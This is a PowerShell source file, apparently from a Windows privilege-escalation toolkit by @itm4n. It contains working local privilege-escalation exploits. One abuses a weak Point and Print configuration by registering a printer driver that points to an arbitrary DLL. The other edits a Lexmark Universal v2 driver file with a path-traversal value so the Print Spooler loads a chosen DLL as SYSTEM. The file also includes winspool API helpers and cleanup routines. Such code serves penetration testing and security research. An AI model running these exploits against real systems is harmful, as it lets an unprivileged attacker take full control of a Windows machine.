function Invoke-PointAndPrintExploit {
    <#
    .SYNOPSIS
    Elevate privileges locally through a vulnerable Point and Print configuration.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet exploits a vulnerable Point and Print configuration by adding a printer driver using a custom DLL. When the exploit is complete, it also attempts to remove the printer driver and delete the copied DLL payload.

    .PARAMETER DllPath
    The full path of a DLL on the local file system.
    #>

    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)]
        [ValidateScript({ [System.IO.Path]::IsPathRooted($_) })]
        [string] $DllPath
    )

    begin {
        $NewDriverName = [Guid]::NewGuid()
        $NewDriverDllPath = $null
        $NewDriverCreated = $false
    }

    process {
        Write-Output "[*] Enumerating printer drivers..."

        $DriverList = [object[]] (Get-WinSpoolPrinterDriver -InfoLevel 2 -ErrorVariable LastError -ErrorAction SilentlyContinue)

        if ($null -eq $DriverList) { if ($LastError) { Write-Output "[-] $($LastError)" } else { Write-Output "[-] Failed to enumerate printer drivers." }; return }

        Write-Output "[*] Found $($DriverList.Count) printer drivers."

        # For DLLs that are not in '%windir%\System32\DriverStore\FileRepository',
        # AddPrinterDriver seems to always fail with the error "The process cannot
        # access the file because it is being used by another process)", so we need
        # to filter out those drivers.
        $DriverList = [object[]] ($DriverList | Where-Object { $_.DriverPath -like "*FileRepository*" })
        $DriverIndex = Get-Random -Minimum 0 -Maximum $DriverList.Count
        $Driver = $DriverList[$DriverIndex]

        Write-Output "[*] Using printer driver '$($Driver.Name)' as a template..."

        $NewDriverInfo = New-Object $script:DRIVER_INFO_2
        $NewDriverInfo.Version = 3 # The operating system version for which the driver was written. The supported value is 3.
        $NewDriverInfo.Name = $NewDriverName
        $NewDriverInfo.Environment = $Driver.Environment
        $NewDriverInfo.DriverPath = $Driver.DriverPath
        $NewDriverInfo.DataFile = $DllPath
        $NewDriverInfo.ConfigFile = $DllPath

        Write-Output "[*] Attempting to create printer driver with name '$($NewDriverInfo.Name)'..."

        $NewDriverCreated = Add-WinSpoolPrinterDriver -DriverInfo $NewDriverInfo -ErrorVariable LastError -ErrorAction SilentlyContinue

        if (-not $NewDriverCreated) { if ($LastError) { Write-Output "[-] $($LastError)" } else { Write-Output "[-] Failed to create printer driver." }; return }

        Write-Output "[+] Printer driver created!"

        $NewDriver = Get-WinSpoolPrinterDriver -InfoLevel 2 | Where-Object { $_.Name -eq $NewDriverName }
        if ($null -eq $NewDriver) { Write-Output "[-] New printer driver not found."; return }

        $NewDriverDllPath = $NewDriver.DataFile

        Write-Output "[*] The payload DLL was copied to: $($NewDriverDllPath)"
    }

    end {
        if ($NewDriverCreated) {
            try { $Success = Remove-WinSpoolPrinterDriver -DriverName "$($NewDriverName)" }
            catch { Write-Verbose $_ }
        }

        if ($NewDriverCreated -and (-not $Success)) { Write-Output "[!] Failed to delete printer driver." }

        if ($null -ne $NewDriverDllPath) {
            if (Test-Path -Path $NewDriverDllPath) {
                Write-Output "[-] Failed to delete payload DLL."
            }
            else {
                Write-Output "[*] The payload DLL was successfully deleted."
            }
        }
    }
}

function Invoke-PrinterDriverExploit {
    <#
    .SYNOPSIS
    Elevate privileges locally through a vulnerable printer driver.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet exploits a vulnerable printer driver to coerce the Print Spooler service to load an arbitrary DLL as SYSTEM.

    .PARAMETER DriverName
    The name of a printer driver to exploit. Default is 'Lexmark Universal v2'.

    .PARAMETER DllPath
    The path of a DLL to load as SYSTEM.
    #>

    [CmdletBinding()]
    param (
        [ValidateSet("Lexmark Universal v2")]
        [string] $DriverName = "Lexmark Universal v2",
        [Parameter(Mandatory=$true)]
        [ValidateScript({ [System.IO.File]::Exists($_) })]
        [string] $DllPath
    )

    begin {
        $PRINTER_ATTRIBUTE_RAW_ONLY = 0x00001000
        $PRINTER_ATTRIBUTE_HIDDEN   = 0x00000020

        switch ($DriverName) {
            "Lexmark Universal v2" {
                $TargetDirectory = Join-Path -Path $env:ProgramData -ChildPath "$($DriverName)"
                $TargetFile = "Universal Color Laser.gdl"
                $ExploitName = "ACIDDAMAGE"
            }
        }

        function TriggerPrinterDriverInstall {
            param (
                [string] $DriverName,
                [string] $ExploitName
            )

            $PrinterInfo = New-Object $script:PRINTER_INFO_2
            $PrinterInfo.PortName = "LPT1:"
            $PrinterInfo.DriverName = $DriverName
            $PrinterInfo.PrinterName = $ExploitName
            $PrinterInfo.PrintProcessor = "WinPrint"
            $PrinterInfo.DataType = "RAW"
            $PrinterInfo.Attributes = $PRINTER_ATTRIBUTE_RAW_ONLY + $PRINTER_ATTRIBUTE_HIDDEN

            Write-Output "[*] Creating a printer to trigger driver install..."

            try { $PrinterHandle = Add-WinSpoolPrinter -PrinterInfo $PrinterInfo }
            catch { Write-Verbose $_ }

            if ($PrinterHandle -eq [IntPtr]::Zero) { Write-Output "[-] Failed to create printer."; return $false }

            Write-Output "[+] Printer created."

            try { $Success = Remove-WinSpoolPrinter -PrinterHandle $PrinterHandle }
            catch { Write-Verbose $_ }

            if (-not $Success) { Write-Output "[!] Failed to delete printer." }

            try { $Success = Close-WinSpoolPrinter -PrinterHandle $PrinterHandle }
            catch { Write-Verbose $_ }

            if (-not $Success) { Write-Output "[!] Failed to close printer." }

            return $true
        }
    }

    process {

        if ($DriverName -eq "Lexmark Universal v2") {

            if (-not [System.IO.Directory]::Exists($TargetDirectory)) {
                Write-Output "[*] Target directory does not exist: $($TargetDirectory)"

                if (-not (TriggerPrinterDriverInstall -DriverName $DriverName -ExploitName $ExploitName)) {
                    return
                }

                if (-not [System.IO.Directory]::Exists($TargetDirectory)) {
                    Write-Output "[-] Target directory still does not exist. Exiting..."
                    return
                }
                else {
                    Write-Output "[+] Target directory exists. Continuing..."
                }
            }

            $Guid = [Guid]::NewGuid().Guid
            $StringMatch = "<GDL_ATTRIBUTE Name=`"*Name`" xsi:type=`"GDLW_string`">LMUD1OUE.DLL</GDL_ATTRIBUTE>"
            $StringReplace = "<GDL_ATTRIBUTE Name=`"*Name`" xsi:type=`"GDLW_string`">..\..\..\..\..\..\$($Guid)\LMUD1OUE.DLL</GDL_ATTRIBUTE>"

            $TargetFilePath = Join-Path -Path $TargetDirectory -ChildPath $TargetFile
            Write-Output "[*] Reading target file: $($TargetFilePath)"
            $TargetFileContent = Get-Content -Path $TargetFilePath

            Write-Output "[*] Modifying target file..."
            $TargetFileContent = $TargetFileContent.Replace($StringMatch, $StringReplace)
            try { $TargetFileContent | Out-File -FilePath $TargetFilePath -Encoding ascii -Force }
            catch { Write-Output "[-] Failed to write target file content. Error: $($_)"; return }

            $TempDirectoryPath = "$($env:SystemDrive)\$($Guid)"
            Write-Output "[*] Creating temp directory '$($TempDirectoryPath)'..."
            $null = New-Item -Path $TempDirectoryPath -ItemType Directory -Force -ErrorAction SilentlyContinue -ErrorVariable NewItemError
            if ($NewItemError) {
                Write-Output "[-] Failed to create temp directory. Error: $($NewItemError)"
                return
            }

            $TargetDllPath = Join-Path -Path $TempDirectoryPath -ChildPath "LMUD1OUE.dll"
            Write-Output "[*] Copying DLL to '$($TargetDllPath)'..."
            $null = Copy-Item -Path $DllPath -Destination $TargetDllPath -Force -ErrorAction SilentlyContinue -ErrorVariable CopyItemError
            if ($CopyItemError) {
                Write-Output "[-] Failed to copy DLL to temp directory. Error: $($CopyItemError)"
                return
            }

            Write-Output "[*] Triggering driver install again to load custom DLL..."
            $null = TriggerPrinterDriverInstall -DriverName $DriverName -ExploitName $ExploitName

            Write-Output "[*] Printer driver installation triggered, the DLL should have been loaded."

            Remove-Item -Path $TargetDirectory -Recurse -Force
            Remove-Item -Path $TempDirectoryPath -Recurse -Force
        }
        else {
            throw "Exploit for '$($DriverName)' not implemented."
        }
    }
}

function Get-WinSpoolPrinterDriver {
    <#
    .SYNOPSIS
    List printer drivers.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet uses the EnumPrinterDrivers API to list the currently installed printer drivers.

    .PARAMETER Environment
    The name of the target environment. If null, the function uses the current environment of the caller.

    .PARAMETER InfoLevel
    The level of information to get for each driver entry. The default is 1 (i.e., name only).
    #>

    [OutputType([Object])]
    [CmdletBinding()]
    param (
        [ValidateSet("Windows x86", "Windows IA64", "Windows x64", "Windows NT R4000")]
        [String] $Environment = $null,
        [ValidateSet(1, 2, 3, 4, 5)]
        [UInt32] $InfoLevel = 1
    )

    begin {
        switch ($InfoLevel) {
            1 { $DriverInfoType = $script:DRIVER_INFO_1 }
            2 { $DriverInfoType = $script:DRIVER_INFO_2 }
            3 { $DriverInfoType = $script:DRIVER_INFO_3 }
            4 { $DriverInfoType = $script:DRIVER_INFO_4 }
            5 { $DriverInfoType = $script:DRIVER_INFO_5 }
        }
    }

    process {

        Write-Verbose "Info level: $($InfoLevel)"

        [UInt32] $BytesNeeded = 0
        [UInt32] $Count = 0
        $null = $script:WinSpool::EnumPrinterDrivers($null, $Environment, $InfoLevel, [IntPtr]::Zero, 0, [ref] $BytesNeeded, [ref] $Count)
        if ($BytesNeeded -eq 0) {
            $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            throw "EnumPrinterDrivers - $([ComponentModel.Win32Exception] $LastError)"
        }

        Write-Verbose "EnumPrinterDrivers OK - BytesNeeded: $($BytesNeeded)"

        $BufferPtr = [IntPtr] [Runtime.InteropServices.Marshal]::AllocHGlobal($BytesNeeded)

        $Success = $script:WinSpool::EnumPrinterDrivers($null, $Environment, $InfoLevel, $BufferPtr, $BytesNeeded, [ref] $BytesNeeded, [ref] $Count)
        if (-not $Success) {
            $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            throw "EnumPrinterDrivers - $([ComponentModel.Win32Exception] $LastError)"
        }

        Write-Verbose "EnumPrinterDrivers OK - Count: $($Count)"

        $CurrentEntryPtr = $BufferPtr

        for ($i = 0; $i -lt $Count; $i++) {

            $DriverEntry = [Runtime.InteropServices.Marshal]::PtrToStructure($CurrentEntryPtr, [type] $DriverInfoType)
            $Offset = [Runtime.InteropServices.Marshal]::SizeOf([type] $DriverInfoType)
            $CurrentEntryPtr = [IntPtr] ($CurrentEntryPtr.ToInt64() + $Offset)

            $DriverEntry
        }

        [Runtime.InteropServices.Marshal]::FreeHGlobal($BufferPtr)
    }
}

function Add-WinSpoolPrinterDriver {
    <#
    .SYNOPSIS
    Add a printer driver.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet uses the AddPrinterDriverEx API to add a custom printer driver.

    .PARAMETER DriverInfo
    An object representing a DRIVER_INFO structure.
    #>

    [OutputType([Bool])]
    [CmdletBinding()]
    param (
        [object] $DriverInfo
    )

    begin {
        $DriverType = $DriverInfo.GetType()
        switch ($DriverType) {
            $script:DRIVER_INFO_2 { $InfoLevel = 2 }
            $script:DRIVER_INFO_3 { $InfoLevel = 3 }
            $script:DRIVER_INFO_4 { $InfoLevel = 4 }
            default { throw "Unhandled type: $($DriverType)" }
        }
        $FileCopyFlags = 0
    }

    process {
        $DriverInfoPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal([Runtime.InteropServices.Marshal]::SizeOf($DriverInfo))
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($DriverInfo, $DriverInfoPtr, $false)

        $FileCopyFlags += $script:APD_FILE_COPY_FLAGS::APD_COPY_ALL_FILES
        $FileCopyFlags += $script:APD_FILE_COPY_FLAGS::APD_COPY_FROM_DIRECTORY
        $FileCopyFlags += $script:APD_FILE_COPY_FLAGS::APD_INSTALL_WARNED_DRIVER

        $Success = $script:WinSpool::AddPrinterDriverEx($null, $InfoLevel, $DriverInfoPtr, $FileCopyFlags)
        if (-not $Success) {
            $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            throw "AddPrinterDriverEx - $([ComponentModel.Win32Exception] $LastError)"
        }

        [Runtime.InteropServices.Marshal]::FreeHGlobal($DriverInfoPtr)

        $Success
    }
}

function Remove-WinSpoolPrinterDriver {
    <#
    .SYNOPSIS
    Remove a printer driver.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet uses the DeletePrinterDriverEx API to remove a printer driver.

    .PARAMETER Environment
    The name of the environment (e.g., "Windows x64"). If "null", the current system's environment is used.

    .PARAMETER DriverName
    The name of the printer driver to install.

    .NOTES
    The flag DPD_DELETE_UNUSED_FILES is used so that the service automatically deletes unused files when the printer driver is removed.
    #>

    [OutputType([Bool])]
    [CmdletBinding()]
    param (
        [ValidateSet("Windows x86", "Windows IA64", "Windows x64", "Windows NT R4000")]
        [string] $Environment = $null,
        [string] $DriverName
    )

    begin {
        $DPD_DELETE_UNUSED_FILES = 1
    }

    process {
        $Success = $script:WinSpool::DeletePrinterDriverEx($null, $Environment, $DriverName, $DPD_DELETE_UNUSED_FILES, 0)
        if (-not $Success) {
            $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            throw "DeletePrinterDriverEx - $([ComponentModel.Win32Exception] $LastError)"
        }
        $Success
    }
}

function Add-WinSpoolPrinter {
    <#
    .SYNOPSIS
    Add a printer.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet uses the AddPrinter API to add a printer on the local machine given a PRINTER_INFO_2 structure.

    .PARAMETER PrinterInfo
    An object representing a PRINTER_INFO_2 structure.
    #>

    [OutputType([IntPtr])]
    [CmdletBinding()]
    param (
        [object] $PrinterInfo
    )

    begin {
        $PrinterHandle = [IntPtr]::Zero
    }

    process {
        $PrinterInfoPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal([Runtime.InteropServices.Marshal]::SizeOf($PrinterInfo))
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($PrinterInfo, $PrinterInfoPtr, $false)

        $PrinterHandle = $script:WinSpool::AddPrinter($null, 2, $PrinterInfoPtr)
        if (($null -eq $PrinterHandle) -or ($PrinterHandle -eq [IntPtr]::Zero)) {
            $PrinterHandle = [IntPtr]::Zero
            $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            throw "AddPrinter - $([ComponentModel.Win32Exception] $LastError)"
        }

        [Runtime.InteropServices.Marshal]::FreeHGlobal($PrinterInfoPtr)
    }

    end {
        $PrinterHandle
    }
}

function Remove-WinSpoolPrinter {
    <#
    .SYNOPSIS
    Remove a printer.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet uses the DeletePrinter API to delete a local printer given a handle to it.

    .PARAMETER PrinterHandle
    A handle on a Printer object, obtained with AddPrinter or OpenPrinter for instance.
    #>

    [OutputType([Bool])]
    [CmdletBinding()]
    param (
        [IntPtr] $PrinterHandle
    )

    begin {
        $Success = $false
    }

    process {
        $Success = $script:WinSpool::DeletePrinter($PrinterHandle)
        if (-not $Success) {
            $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            throw "DeletePrinter - $([ComponentModel.Win32Exception] $LastError)"
        }
    }

    end {
        $Success
    }
}

function Close-WinSpoolPrinter {
    <#
    .SYNOPSIS
    Close a Printer handle.

    Author: @itm4n
    License: BSD 3-Clause

    .DESCRIPTION
    This cmdlet uses the ClosePrinter Api to close a previously obtained handle to a Printer object.

    .PARAMETER PrinterHandle
    A handle to a Printer object.
    #>

    [OutputType([Bool])]
    [CmdletBinding()]
    param (
        [IntPtr] $PrinterHandle
    )

    begin {
        $Success = $false
    }

    process {
        $Success = $script:WinSpool::ClosePrinter($PrinterHandle)
        if (-not $Success) {
            $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            throw "ClosePrinter - $([ComponentModel.Win32Exception] $LastError)"
        }
    }

    end {
        $Success
    }
}